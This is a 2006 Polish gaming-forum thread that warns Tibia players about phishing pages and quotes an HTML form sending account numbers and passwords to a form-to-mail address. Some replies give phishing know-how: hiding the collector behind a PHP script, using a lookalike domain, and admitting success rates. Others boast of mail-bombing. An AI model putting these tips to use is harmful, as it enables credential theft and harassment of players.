PDA

Pokaż pełną wersje : www.podajswojepassy.pl - czyli jak ustrzec się od hacka na konto !!!


Maxxel
12-04-2006, 18:44
Tak jak w temacie. Gracze (pseudo-hackerzy bo tak ich trzeba nazwać) robią strony wyglądające jak oficjalna strona Tibii (z polami na wpisanie account number'a i password'a - Strona wygląda jak "My account"). Strony te wabią ludzi tym że obiecują np: darmowy PACC na jakimś tam okres lub jakieś ekstra itemy (oczywiście wszystko za free bo, wystarczy tylko dać swoje passy i kliknąć na przycisk "Submit"). Lecz sprawa wygląda mniej kolorowo ponieważ gdy się kliknie na "Submit" twoje passy zamiast na tibia.com lecą na prywatne konto e-mail założyciela strony. Oczywiście mądżejszy gracz sprawdzi kod źródłowy tej strony i znajdzie linijkę z adresem na który są wysyłane jego passy. Ale ci "hackerzy" zabezpieczają sie przed tym stosując "ramki" na stronach (kto trochę kuma HTML'a to wie o co chodzi :P) przez co sprawdzając kod źródłowy sprawdzamy z jakich innych stron składa się ta strona (i niemozemy sprawdzić kodu źródłowego strony która nas interesuje). Oczywiście można to obejść :evul: :

Podam przykład z Mozilli Forefox (bo IE nie używam) :

- klikamy na stronie prawym przyciskiem myszy i wysuwa nam się menu podręczne
- z menu wybieramy Ramka>Pokaż tylko ramkę lub Pokaż źródło ramki

i znajdujemy tam takie linijki kodu :

<form method="POST" action="http://free4web.pl/Form2Mail/">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="zwrtadr" value="http://tibia.4players.de/home/?subtopic=account">
<TABLE BORDER=0 CELLPADDING=1>
<TR><TD>Number: </TD><TD><INPUT TYPE=password name="ID" SIZE=10 MAXLENGTH=10></TD></TR>

<TR><TD>Password: </TD><TD><INPUT TYPE=password NAME="pass" SIZE=29 MAXLENGTH=29></TD></TR>
</TABLE>

"[email protected]" to adres na które wysyłane są passy gościa który się nabrał

Kubon
12-04-2006, 18:48
Taak ten temat dobry, ale te linki....
Jakis (powiedzmy) niedoswiadczony gracz moze tam wejsc bez czytania topicu. I co wtedy??

Maxxel
12-04-2006, 18:50
Taak ten temat dobry, ale te linki....
Jakis (powiedzmy) niedoswiadczony gracz moze tam wejsc bez czytania topicu. I co wtedy??

Hack :P bo trzeba było czytać :P

Gustek
12-04-2006, 18:59
@topic
GZ za pomysł! Niech ludzie się uświadomią... mnie już raz hack spotkał (nie wiem jak bo na takie strny nie wchodziłem x/) i nie życzę tego nikomu innemu.

@Kubon
To niech się nauczą czytać :P

Vanzi
12-04-2006, 19:05
Podając adresy powinieneś to robić tak, aby po kliknięciu na niego otwierała się jakaś bezpieczna strona... bo jeszcze ktoś kliknie, zapomni się i zaloguje sie ^.-

Rybzor
12-04-2006, 19:05
Wogule nie podawaj przykladowych stron...

Pozatym jest setka tysięcy poradnikow na ten temat;/, no ale o takim sposobie malo kto wspomina, watpie zeby ktos tak sprawdzal, ale moze sie komus przyda ;)

Maxxel
12-04-2006, 19:40
OK poprawiłem te linki żeby nikt tam nie wszedł i się nie lognoł. Ale powiedzcie czy osoba która wchodzi na forum którego wogóle nieczyta tylko szuka linków żeby na nie wejść nieklasyfikuje się do grona noobów? Ja myślę że tak i myślę też że będzie miał/ła nauczkę za nieczytanie postów ;) .

Raul
12-04-2006, 20:03
Bez żadnych linków ani adresów do tego typu stron proszę.

prywek
12-04-2006, 20:21
podaj jescze link do mailbombera i juz bedzie git :]

dargot
12-04-2006, 20:40
sprawa wyglada jano wystarczy 10 min zeby wejsci na jego poczte !

wrot3k
12-04-2006, 21:10
Prywek - http://rapidshare.de/files/17351143/uhm*********** mówisz i masz xD Mail bomber własnej roboty.

Btw, coś podobnego chciałem napisać :] Ale bardziej polecam zrobienie spamu przez wypelnianie X razy tej ankiety, gdyz pozostajemy anonimowi. Osobiscie juz zapchalem tak kilka kont mailowych wiadomosciami typu "nooob noob noob!!!"

Avager
12-04-2006, 22:07
Heh, osobiście sam mam taką pseudo stronke ;p ,
I powiedzieć moge że na 100 osób nabiera się średnio 10 ... więc to dość dużo (lvle 8-40).

A co do tego że znajdziesz tam w kodzie źródłowym....jeśli jednak jest inna domena (przed tym zanim dojdzie sie do HOST'a). W źródle będzie podany link z domeny do hosta nastepnie trzeba w ten link wejsc, i masz zrodlo gotowe, znajdujesz maila i gotowe.
JEst jednak ale... PHP :>

<form method="POST" action="mail.php">
;)


szybko, czysto i bezpiecznie :>
Chyba ze ktos znajdzie mail.php ... ale watpie...jesli zastrzeszesz go haslem.. .

Pacek
12-04-2006, 22:11
temat taki sobie recepta na to żeby nikt sie nie włamał na nasze konto jest o wiele prostsza. Nie wchodzić na nic innego tylko na tibie.com, nie ściągać niczego i nie używać dziwnych programów. 100% ze "hacka" nie będzie
ps. podoba mi sie stwierdzenie "ja ustrzec sie od hacka na konto" chyba każdy mi przyzna że sformułowane dość niefortunnie, rozbawiło mnie to [; 3maj sie

Avager
12-04-2006, 22:32
up:

Wiesz...

www.tibla.com/forum/?subtopic~cos tam cos tam


jak to szybko czytasz to sie nabierzesz :)) (to tylko przyklad... planuje podobna domene wykupic ;) ).

wrot3k
12-04-2006, 22:42
Imo fake'i na maila sa denne, lepiej zrobic prosty skrypcik w php ktory dodaje dane z formularza do jakiegos pliku txt.

Nikast Shynix
12-04-2006, 22:52
czy mi sie wydaje, czy takich tematów było dość sporo?

Avager
12-04-2006, 23:46
Wydaje Ci sie.